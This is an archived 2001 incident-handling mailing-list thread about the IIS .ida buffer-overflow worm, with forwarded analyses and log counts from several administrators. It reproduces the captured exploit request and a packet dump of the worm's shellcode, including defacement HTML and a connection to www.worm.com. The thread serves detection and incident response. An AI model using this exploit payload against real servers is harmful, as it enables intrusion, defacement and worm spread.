Scott, Check out Richard Bejtlich's posting to this list from Sunday. For your convenience I'm including it here. Looks like the new IIS worm. I've been tracking it on my IDS and reporting it since Sunday 07/15. After I figured out what to look for I went back through my logs and found the first worm hit (http scan traffic) at 08:54:30 EDT on 07/13 from 202.192.168.145, followed within 15 minutes by additional scans from 210.77.157.171, 202.204.193.2 and 210.68.172.1. So far (as of about 8 hours ago) I logged the http scan from 8122 unique - assumedly compromised - hosts since the first hit on 07/13. In the absence of any advisories about this activity many admins are increduluous when I when I report it to them. But I have received response from a number of sites (20-30) confirming the IIS compromise. Regards Ken Ken Eichman Senior Security Engineer Chemical Abstracts Service Tel: (614) 447-3838 ext 3230 2540 Olentangy River Road Fax: (614) 447-3855 Columbus, OH 43210 Email: keichmanat_private ======================================================================= Forwarded mail follows: Date: Sun, 15 Jul 2001 16:25:42 -0500 From: Richard Bejtlich <richardat_private> Reply-To: richardat_private Organization: TaoSecurity.com Subject: IIS .ida exploit involving worm.com / 181.com / 216.99.52.100 Friends in the security world, I have recently observed multiple exploit attempts related to the "Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability" described here: http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880 It looks like successful execution of an exploit in the wild may result in the compromised machine making a connection to www.worm.com to report its status (216.99.52.100, also aliased as 181.com and chinga.com; note chinga.com also has an address of 209.81.7.23). Below is the signature of the exploit. I edited sections marked XXcensoredXX to preserve my privacy: GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 USVWp hdGd=o `hXw pXXXxu XX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f LTQLLLLLLLXTH LLXp Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPut tjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_] {xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET ? HTTP/1.0 Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 c:\notwormLMTH <html><head><meta http-equiv="Content-Type" content="text/html; charset=english"><title>HELLO!</title></head><bady><hr size=5><font color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 90 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> XXcensoredXX: Unknown WWW server.</BODY> ----- Curious about www.worm.com, I connected to port 80 on the box and found this: telnet www.worm.com 80 Trying 216.99.52.100... Connected to chinga.com (216.99.52.100). Escape character is '^]'. <HTML> <HEAD> <META HTTP-EQUIV="REFRESH" CONTENT="0.01; URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml"> <TITLE> Nett Corp </TITLE> </HEAD> <blockquote><!-- dlogphp activated, unique hit site is 181.com. IP is XXcensored, but it was my IP addressXX. Broswer is --> </blockquote> </BODY> </HTML> Connection closed by foreign host. ----- You can see in the 'dlogphp activated' section that my IP address appears to have been logged. (I removed the actual IP address.) I suggest that readers check their logs for connections to 216.99.52.100 (www.worm.com), as outbound connections MAY indicate a compromised host. I am not a Windows expert and cannot validate the exploit as recorded in my logs, but I believe you may find this warning useful. Sincerely, Richard Bejtlich http://bejtlich.net ======================================================= ================ Your original message: =============== Date: Tue, 17 Jul 2001 19:37:57 +0100 From: Scott Nursten <scott.nurstenat_private> MIME-Version: 1.0 To: incidentsat_private Subject: Re: Strange web traffic Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry. Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this: 9:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48) 0x0000 4500 0030 bfde 4000 7406 671a d956 d651 E..0..@.t.g..V.Q 0x0010 c282 6da4 0fc5 0050 e2c8 0dc2 0000 0000 ..m....P........ 0x0020 7002 2238 8078 0000 0204 05b4 0101 0402 p."8.x.......... 19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48) 0x0000 4500 0030 0000 4000 4006 5af9 c282 6da4 E..0..@.@.Z...m. 0x0010 d956 d651 0050 0fc5 04c3 3130 e2c8 0dc3 .V.Q.P....10.... 0x0020 7012 16d0 55dc 0000 0204 05b4 0101 0402 p...U........... 19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40) 0x0000 4500 0028 c00a 4000 7406 66f6 d956 d651 E..(..@.t.f..V.Q 0x0010 c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131 ..m....P......11 0x0020 5010 2238 7738 0000 6d78 0000 0003 P."8w8..mx.... 19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44) 0x0000 4500 002c c00b 4000 7406 66f1 d956 d651 E..,..@.t.f..V.Q 0x0010 c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131 ..m....P......11 0x0020 5018 2238 dbc6 0000 4745 5420 6540 P."8....GET.e@ 19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40) 0x0000 4500 0028 3d19 4000 4006 1de8 c282 6da4 E..(=.@.@.....m. 0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 0dc7 .V.Q.P....11.... 0x0020 5010 16d0 829c 0000 P....... 19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500) 0x0000 4500 05dc c00c 4000 7406 6140 d956 d651 E.....@.t.a@.V.Q 0x0010 c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131 ..m....P......11 0x0020 5018 2238 73c8 0000 2f64 6566 6175 6c74 P."8s.../default 0x0030 2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e .ida?NNNNNNNNNNN 0x0040 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0050 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0060 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0070 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0080 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0090 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00a0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00b0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00c0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00d0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00e0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x00f0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0100 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 0x0110 4e4e 4e4e 4e25 7539 3039 3025 7536 3835 NNNNN%u9090%u685 0x0120 3825 7563 6264 3325 7537 3830 3125 7539 8%ucbd3%u7801%u9 0x0130 3039 3025 7536 3835 3825 7563 6264 3325 090%u6858%ucbd3% 0x0140 7537 3830 3125 7539 3039 3025 7536 3835 u7801%u9090%u685 0x0150 3825 7563 6264 3325 7537 3830 3125 7539 8%ucbd3%u7801%u9 0x0160 3039 3025 7539 3039 3025 7538 3139 3025 090%u9090%u8190% 0x0170 7530 3063 3325 7530 3030 3325 7538 6230 u00c3%u0003%u8b0 0x0180 3025 7535 3331 6225 7535 3366 6625 7530 0%u531b%u53ff%u0 0x0190 3037 3825 7530 3030 3025 7530 303d 6120 078%u0000%u00=a. 0x01a0 2048 5454 502f 312e 300d 0a43 6f6e 7465 .HTTP/1.0..Conte 0x01b0 6e74 2d74 7970 653a 2074 6578 742f 786d nt-type:.text/xm 0x01c0 6c0a 484f 5354 3a77 7777 2e77 6f72 6d2e l.HOST:www.worm. 0x01d0 636f 6d0a 2041 6363 6570 743a 202a 2f2a com..Accept:.*/* 0x01e0 0a43 6f6e 7465 6e74 2d6c 656e 6774 683a .Content-length: 0x01f0 2033 3536 3920 0d0a 0d0a 558b ec81 ec18 .3569.....U..... 0x0200 0200 0053 5657 8dbd e8fd ffff b986 0000 ...SVW.......... 0x0210 00b8 cccc cccc f3ab c785 70fe ffff 0000 ..........p..... 0x0220 0000 e90a 0b00 008f 8568 feff ff8d bdf0 .........h...... 0x0230 feff ff64 a100 0000 0089 4708 6489 3d00 ...d......G.d.=. 0x0240 0000 00e9 6f0a 0000 8f85 60fe ffff c785 ....o.....`..... 0x0250 f0fe ffff ffff ffff 8b85 68fe ffff 83e8 ..........h..... 0x0260 0789 85f4 feff ffc7 8558 feff ff00 00e0 .........X...... 0x0270 77e8 9b0a 0000 83bd 70fe ffff 000f 85dd w.......p....... 0x0280 0100 008b 8d58 feff ff81 c100 0001 0089 .....X.......... 0x0290 8d58 feff ff81 bd58 feff ff00 0000 7875 .X.....X......xu 0x02a0 0ac7 8558 feff ff00 00f0 bf8b 9558 feff ...X.........X.. 0x02b0 ff33 c066 8b02 3d4d 5a00 000f 859a 0100 .3.f..=MZ....... 0x02c0 008b 8d58 feff ff8b 513c 8b85 58fe ffff ...X....Q<..X... 0x02d0 33c9 668b 0c10 81f9 5045 0000 0f85 7901 3.f.....PE....y. 0x02e0 0000 8b95 58fe ffff 8b42 3c8b 8d58 feff ....X....B<..X.. 0x02f0 ff8b 5401 7803 9558 feff ff89 9554 feff ..T.x..X.....T.. 0x0300 ff8b 8554 feff ff8b 480c 038d 58fe ffff ...T....H...X... 0x0310 898d 4cfe ffff 8b95 4cfe ffff 813a 4b45 ..L.....L....:KE 0x0320 524e 0f85 3301 0000 8b85 4cfe ffff 8178 RN..3.....L....x 0x0330 0445 4c33 320f 8520 0100 008b 8d58 feff .EL32........X.. 0x0340 ff89 8d34 feff ff8b 9554 feff ff8b 8558 ...4.....T.....X 0x0350 feff ff03 4220 8985 4cfe ffff c785 48fe ....B...L.....H. 0x0360 ffff 0000 0000 eb1e 8b8d 48fe ffff 83c1 ..........H..... 0x0370 0189 8d48 feff ff8b 954c feff ff83 c204 ...H.....L...... 0x0380 8995 4cfe ffff 8b85 54fe ffff 8b8d 48fe ..L.....T.....H. 0x0390 ffff 3b48 180f 8dc0 0000 008b 954c feff ..;H.........L.. 0x03a0 ff8b 028b 8d58 feff ff81 3c01 4765 7450 .....X....<.GetP 0x03b0 0f85 a000 0000 8b95 4cfe ffff 8b02 8b8d ........L....... 0x03c0 58fe ffff 817c 0104 726f 6341 0f85 8400 X....|..rocA.... 0x03d0 0000 8b95 48fe ffff 0395 48fe ffff 0395 ....H.....H..... 0x03e0 58fe ffff 8b85 54fe ffff 8b48 2433 c066 X.....T....H$3.f 0x03f0 8b04 0a89 854c feff ff8b 8d54 feff ff8b .....L.....T.... 0x0400 5110 8b85 4cfe ffff 8d4c 10ff 898d 4cfe Q...L....L....L. 0x0410 ffff 8b95 4cfe ffff 0395 4cfe ffff 0395 ....L.....L..... 0x0420 4cfe ffff 0395 4cfe ffff 0395 58fe ffff L.....L.....X... 0x0430 8b85 54fe ffff 8b48 1c8b 140a 8995 4cfe ..T....H......L. 0x0440 ffff 8b85 4cfe ffff 0385 58fe ffff 8985 ....L.....X..... 0x0450 70fe ffff eb05 e90d ffff ffe9 16fe ffff p............... 0x0460 8dbd f0fe ffff 8b47 0864 a300 0000 0083 .......G.d...... 0x0470 bd70 feff ff00 7505 e938 0800 00c7 854c .p....u..8.....L 0x0480 feff ff01 0000 00eb 0f8b 8d4c feff ff83 ...........L.... 0x0490 c101 898d 4cfe ffff 8b95 68fe ffff 0fbe ....L.....h..... 0x04a0 0285 c00f 848d 0000 008b 8d68 feff ff0f ...........h.... 0x04b0 be11 83fa 0975 218b 8568 feff ff83 c001 .....u!..h...... 0x04c0 8bf4 50ff 9590 feff ff3b f490 434b 434b ..P......;..CKCK 0x04d0 8985 34fe ffff eb2a 8bf4 8b8d 68fe ffff ..4....*....h... 0x04e0 518b 9534 feff ff52 ff95 70fe ffff 3bf4 Q..4...R..p...;. 0x04f0 9043 4b43 4b8b 8d4c feff ff89 848d 8cfe .CKCK..L........ 0x0500 ffff eb0f 8b95 68fe ffff 83c2 0189 9568 ......h........h 0x0510 feff ff8b 8568 feff ff0f be08 85c9 7402 .....h........t. 0x0520 ebe2 8b95 68fe ffff 83c2 0189 9568 feff ....h........h.. 0x0530 ffe9 53ff ffff 8b85 68fe ffff 83c0 0189 ..S.....h....... 0x0540 8568 feff ff8b 4d08 8b91 8400 0000 8995 .h....M......... 0x0550 6cfe ffff c785 4cfe ffff 0400 0000 c685 l.....L......... 0x0560 d0fe ffff 688b 4508 8985 d1fe ffff c785 ....h.E......... 0x0570 d5fe ffff 5b53 53ff c785 d9fe ffff 6378 ....[SS.......cx 0x0580 9090 8b4d 088b 5110 8995 50fe ffff 83bd ...M..Q...P..... 0x0590 50fe ffff 0075 268b f46a 008d 854c feff P....u&..j...L.. 0x05a0 ff50 8b8d 68fe ffff 518b 5508 8b42 0850 .P..h...Q.U..B.P 0x05b0 ff95 6cfe ffff 3bf4 9043 4b43 4b83 bd50 ..l...;..CKCK..P 0x05c0 feff ff64 7d5c 8b8d 50fe ffff 83c1 0189 ...d}\..P....... 0x05d0 8d50 feff ff8b 9550 feff ff69 .P.....P...i 19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40) 0x0000 4500 0028 3d1a 4000 4006 1de7 c282 6da4 E..(=.@.@.....m. 0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 137b .V.Q.P....11...{ 0x0020 5010 2238 7180 0000 P."8q... 19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539) 0x0000 4500 021b 3d1b 4000 4006 1bf3 c282 6da4 E...=.@.@.....m. 0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 137b .V.Q.P....11...{ 0x0020 5018 2238 4829 0000 4854 5450 2f31 2e31 P."8H)..HTTP/1.1 0x0030 2034 3030 2042 6164 2052 6571 7565 7374 .400.Bad.Request 0x0040 0d0a 4461 7465 3a20 5475 652c 2031 3720 ..Date:.Tue,.17. 0x0050 4a75 6c20 3230 3031 2031 383a 3135 3a33 Jul.2001.18:15:3 0x0060 3820 474d 540d 0a53 6572 7665 723a 2041 8.GMT..Server:.A 0x0070 7061 6368 652f 312e 332e 3230 2028 556e pache/1.3.20.(Un 0x0080 6978 2920 5048 502f 342e 302e 360d 0a43 ix).PHP/4.0.6..C 0x0090 6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365 onnection:.close 0x00a0 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type:. 0x00b0 7465 7874 2f68 746d 6c3b 2063 6861 7273 text/html;.chars 0x00c0 6574 3d69 736f 2d38 3835 392d 310d 0a0d et=iso-8859-1... 0x00d0 0a3c 2144 4f43 5459 5045 2048 544d 4c20 .<!DOCTYPE.HTML. 0x00e0 5055 424c 4943 2022 2d2f 2f49 4554 462f PUBLIC."-//IETF/ 0x00f0 2f44 5444 2048 544d 4c20 322e 302f 2f45 /DTD.HTML.2.0//E 0x0100 4e22 3e0a 3c48 544d 4c3e 3c48 4541 443e N">.<HTML><HEAD> 0x0110 0a3c 5449 544c 453e 3430 3020 4261 6420 .<TITLE>400.Bad. 0x0120 5265 7175 6573 743c 2f54 4954 4c45 3e0a Request</TITLE>. 0x0130 3c2f 4845 4144 3e3c 424f 4459 3e0a 3c48 </HEAD><BODY>.<H 0x0140 313e 4261 6420 5265 7175 6573 743c 2f48 1>Bad.Request</H 0x0150 313e 0a59 6f75 7220 6272 6f77 7365 7220 1>.Your.browser. 0x0160 7365 6e74 2061 2072 6571 7565 7374 2074 sent.a.request.t 0x0170 6861 7420 7468 6973 2073 6572 7665 7220 hat.this.server. 0x0180 636f 756c 6420 6e6f 7420 756e 6465 7273 could.not.unders 0x0190 7461 6e64 2e3c 503e 0a43 6c69 656e 7420 tand.<P>.Client. 0x01a0 7365 6e74 206d 616c 666f 726d 6564 2048 sent.malformed.H 0x01b0 6f73 7420 6865 6164 6572 3c50 3e0a 3c48 ost.header<P>.<H 0x01c0 523e 0a3c 4144 4452 4553 533e 4170 6163 R>.<ADDRESS>Apac 0x01d0 6865 2f31 2e33 2e32 3020 5365 7276 6572 he/1.3.20.Server 0x01e0 2061 7420 7469 7461 6e69 612e 696e 6672 .at.titania.infr 0x01f0 6f6e 742e 636f 2e75 6b20 506f 7274 2038 ont.co.uk.Port.8 0x0200 303c 2f41 4444 5245 5353 3e0a 3c2f 424f 0</ADDRESS>.</BO 0x0210 4459 3e3c 2f48 544d 4c3e 0a DY></HTML>. 19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40) 0x0000 4500 0028 3d1c 4000 4006 1de5 c282 6da4 E..(=.@.@.....m. 0x0010 d956 d651 0050 0fc5 04c3 3324 e2c8 137b .V.Q.P....3$...{ 0x0020 5011 2238 6f8c 0000 P."8o... 19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500) 0x0000 4500 05dc c03c 4000 7406 6110 d956 d651 E....<@.t.a..V.Q 0x0010 c282 6da4 0fc5 0050 e2c8 137b 04c3 3131 ..m....P...{..11 0x0020 5010 2238 e9b2 0000 d28d 66f0 5089 9574 P."8......f.P..t 0x0030 feff ff8b 4508 8b8d 50fe ffff 8948 108b ....E...P....H.. 0x0040 f48d 952c feff ff52 6a00 8d85 4cfe ffff ...,...Rj...L... 0x0050 508d 8dd0 feff ff51 6a00 6a00 ff95 98fe P......Qj.j..... 0x0060 ffff 3bf4 9043 4b43 4be9 9f01 0000 8bf4 ..;..CKCK....... 0x0070 ff95 a4fe ffff 3bf4 9043 4b43 4b89 854c ......;..CKCK..L 0x0080 feff ff8b 954c feff ff81 e2ff ff00 0089 .....L.......... 0x0090 954c feff ff81 bd4c feff ff09 0400 0074 .L.....L.......t 0x00a0 05e9 6701 0000 8bf4 6800 dd6d 00ff 95a0 ..g.....h..m.... 0x00b0 feff ff3b f490 434b 434b e980 0600 008f ...;..CKCK...... 0x00c0 854c feff ff8b 8534 feff ff89 85cc feff .L.....4........ 0x00d0 ff8b 8d4c feff ff8b 95b0 feff ff89 118b ...L............ 0x00e0 854c feff ff8b 8dc8 feff ff89 4804 8b95 .L..........H... 0x00f0 68fe ffff 8995 50fe ffff eb0f 8b85 50fe h.....P.......P. 0x0100 ffff 83c0 0189 8550 feff ff8b 8d68 feff .......P.....h.. 0x0110 ff81 c100 0100 0039 8d50 feff ff73 128b .......9.P...s.. 0x0120 9550 feff ff81 3a4c 4d54 4875 02eb 02eb .P....:LMTHu.... 0x0130 cb8b 8550 feff ff83 c004 8b8d 4cfe ffff ...P........L... 0x0140 8941 088b f48d 9548 feff ff52 6a04 6800 .A.....H...Rj.h. 0x0150 4000 008b 85cc feff ff50 ff95 a8fe ffff @........P...... 0x0160 3bf4 9043 4b43 4bc7 854c feff ff00 0000 ;..CKCK..L...... 0x0170 00eb 0f8b 8d4c feff ff83 c101 898d 4cfe .....L........L. 0x0180 ffff 81bd 4cfe ffff 0030 0000 7d56 8b95 ....L....0..}V.. 0x0190 ccfe ffff 0395 4cfe ffff 8b02 3b85 b0fe ......L.....;... 0x01a0 ffff 753e 8b8d ccfe ffff 038d 4cfe ffff ..u>........L... 0x01b0 8b95 60fe ffff 8911 8bf4 6800 5125 02ff ..`.......h.Q%.. 0x01c0 95a0 feff ff3b f490 434b 434b 8b85 ccfe .....;..CKCK.... 0x01d0 ffff 0385 4cfe ffff 8b8d b0fe ffff 8908 ....L........... 0x01e0 eb02 eb8f 8bf4 8d95 4cfe ffff 528b 8548 ........L...R..H 0x01f0 feff ff50 6800 4000 008b 8dcc feff ff51 ...Ph.@........Q 0x0200 ff95 a8fe ffff 3bf4 9043 4b43 4bba 0100 ......;..CKCK... 0x0210 0000 85d2 0f84 e704 0000 8bf4 6a00 6880 ............j.h. 0x0220 0000 006a 036a 006a 0168 0000 0080 8b85 ...j.j.j.h...... 0x0230 68fe ffff 83c0 6350 ff95 9cfe ffff 3bf4 h.....cP......;. 0x0240 9043 4b43 4b89 8530 feff ff83 bd30 feff .CKCK..0.....0.. 0x0250 ffff 741f b901 0000 0085 c974 168b f468 ..t........t...h 0x0260 ffff ff7f ff95 a0fe ffff 3bf4 9043 4b43 ..........;..CKC 0x0270 4beb e18b f48d 9538 feff ff52 ff95 94fe K......8...R.... 0x0280 ffff 3bf4 9043 4b43 4b8b 853e feff ff89 ..;..CKCK..>.... 0x0290 854c feff ff8b 8d4c feff ff81 e1ff ff00 .L.....L........ 0x02a0 0089 8d4c feff ff83 bd4c feff ff14 0f8c ...L.....L...... 0x02b0 4701 0000 ba01 0000 0085 d20f 843a 0100 G............:.. 0x02c0 008b f48d 8538 feff ff50 ff95 94fe ffff .....8...P...... 0x02d0 3bf4 9043 4b43 4b8b 8d3e feff ff89 8d4c ;..CKCK..>.....L 0x02e0 feff ff8b 954c feff ff81 e2ff ff00 0089 .....L.......... 0x02f0 954c feff ff83 bd4c feff ff1c 7c1f b801 .L.....L....|... 0x0300 0000 0085 c074 168b f468 ffff ff7f ff95 .....t...h...... 0x0310 a0fe ffff 3bf4 9043 4b43 4beb e18b f46a ....;..CKCK....j 0x0320 64ff 95a0 feff ff3b f490 434b 434b 8bf4 d......;..CKCK.. 0x0330 6a00 6a01 6a02 ff95 b8fe ffff 3bf4 9043 j.j.j.......;..C 0x0340 4b43 4b89 8578 feff ff66 c785 7cfe ffff KCK..x...f..|... 0x0350 0200 66c7 857e feff ff00 50c7 8580 feff ..f..~....P..... 0x0360 ffc6 89f0 5b8b f46a 108d 8d7c feff ff51 ....[..j...|...Q 0x0370 8b95 78fe ffff 52ff 95bc feff ff3b f490 ..x...R......;.. 0x0380 434b 434b c785 4cfe ffff 0000 0000 eb0f CKCK..L......... 0x0390 8b85 4cfe ffff 83c0 0189 854c feff ff81 ..L........L.... 0x03a0 bd4c feff ff00 8001 007d 378b f468 e803 .L.......}7..h.. 0x03b0 0000 ff95 a0fe ffff 3bf4 9043 4b43 4b8b ........;..CKCK. 0x03c0 f46a 006a 018d 8dfc feff ff51 8b95 78fe .j.j.......Q..x. 0x03d0 ffff 52ff 95c0 feff ff3b f490 434b 434b ..R......;..CKCK 0x03e0 ebae 8bf4 6800 0000 01ff 95a0 feff ff3b ....h..........; 0x03f0 f490 434b 434b e9b9 feff ff8b 8544 feff ..CKCK.......D.. 0x0400 ff89 8550 feff ff8b 8d50 feff ff0f af8d ...P.....P...... 0x0410 50fe ffff 69c9 e359 cd00 8b95 50fe ffff P...i..Y....P... 0x0420 69d2 b9e1 0100 8b85 74fe ffff 03c1 03d0 i.......t....... 0x0430 8995 50fe ffff 8b8d 74fe ffff 69c9 8333 ..P.....t...i..3 0x0440 cf00 81c1 53fe 6b07 898d 74fe ffff 8b95 ....S.k...t..... 0x0450 74fe ffff 81e2 ff00 0000 8995 50fe ffff t...........P... 0x0460 83bd 50fe ffff 7f74 0c81 bd50 feff ffe0 ..P....t...P.... 0x0470 0000 0075 118b 8574 feff ff05 a90d 0200 ...u...t........ 0x0480 8985 74fe ffff 8bf4 6a64 ff95 a0fe ffff ..t.....jd...... 0x0490 3bf4 9043 4b43 4b8b f46a 006a 016a 02ff ;..CKCK..j.j.j.. 0x04a0 95b8 feff ff3b f490 434b 434b 8985 78fe .....;..CKCK..x. 0x04b0 ffff 66c7 857c feff ff02 0066 c785 7efe ..f..|.....f..~. 0x04c0 ffff 0050 8b8d 74fe ffff 898d 80fe ffff ...P..t......... 0x04d0 8bf4 6a10 8d95 7cfe ffff 528b 8578 feff ..j...|...R..x.. 0x04e0 ff50 ff95 bcfe ffff 3bf4 9043 4b43 4b85 .P......;..CKCK. 0x04f0 c00f 85ef 0100 008b f46a 006a 048b 8d68 .........j.j...h 0x0500 feff ff51 8b95 78fe ffff 52ff 95c0 feff ...Q..x...R..... 0x0510 ff3b f490 434b 434b c785 4cfe ffff 0000 .;..CKCK..L..... 0x0520 0000 8b45 088b 4868 898d 64fe ffff eb1e ...E..Hh..d..... 0x0530 8b95 64fe ffff 83c2 0189 9564 feff ff8b ..d........d.... 0x0540 854c feff ff83 c001 8985 4cfe ffff 8b8d .L........L..... 0x0550 64fe ffff 0fbe 1185 d274 02eb d38b f46a d........t.....j 0x0560 008b 854c feff ff50 8b4d 088b 5168 528b ...L...P.M..QhR. 0x0570 8578 feff ff50 ff95 c0fe ffff 3bf4 9043 .x...P......;..C 0x0580 4b43 4b8b f46a 006a 018b 8d68 feff ff83 KCK..j.j...h.... 0x0590 c105 518b 9578 feff ff52 ff95 c0fe ffff ..Q..x...R...... 0x05a0 3bf4 9043 4b43 4bc7 854c feff ff00 0000 ;..CKCK..L...... 0x05b0 008b 4508 8b48 6489 8d64 feff ffeb 1e8b ..E..Hd..d...... 0x05c0 9564 feff ff83 c201 8995 64fe ffff 8b85 .d........d..... 0x05d0 4cfe ffff 83c0 0189 854c feff L........L.. 19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40) 0x0000 4500 0028 3d1d 4000 4006 1de4 c282 6da4 E..(=.@.@.....m. 0x0010 d956 d651 0050 0fc5 04c3 3325 e2c8 192f .V.Q.P....3%.../ 0x0020 5010 2da0 5e70 0000 P.-.^p.. Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes). HTH some more. Rgds, Scott Scott Nursten - Systems Administrator ---------------------------------------------- ddi: +44 (0) 1293 744 122 work: +44 (0) 1293 402 040 fax: +44 (0) 1293 402 050 email: scottnat_private wwweb: http://www.streetsonline.co.uk ---------------------------------------------- "Without order nothing can exist - without chaos nothing can evolve." ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:00:42 PDT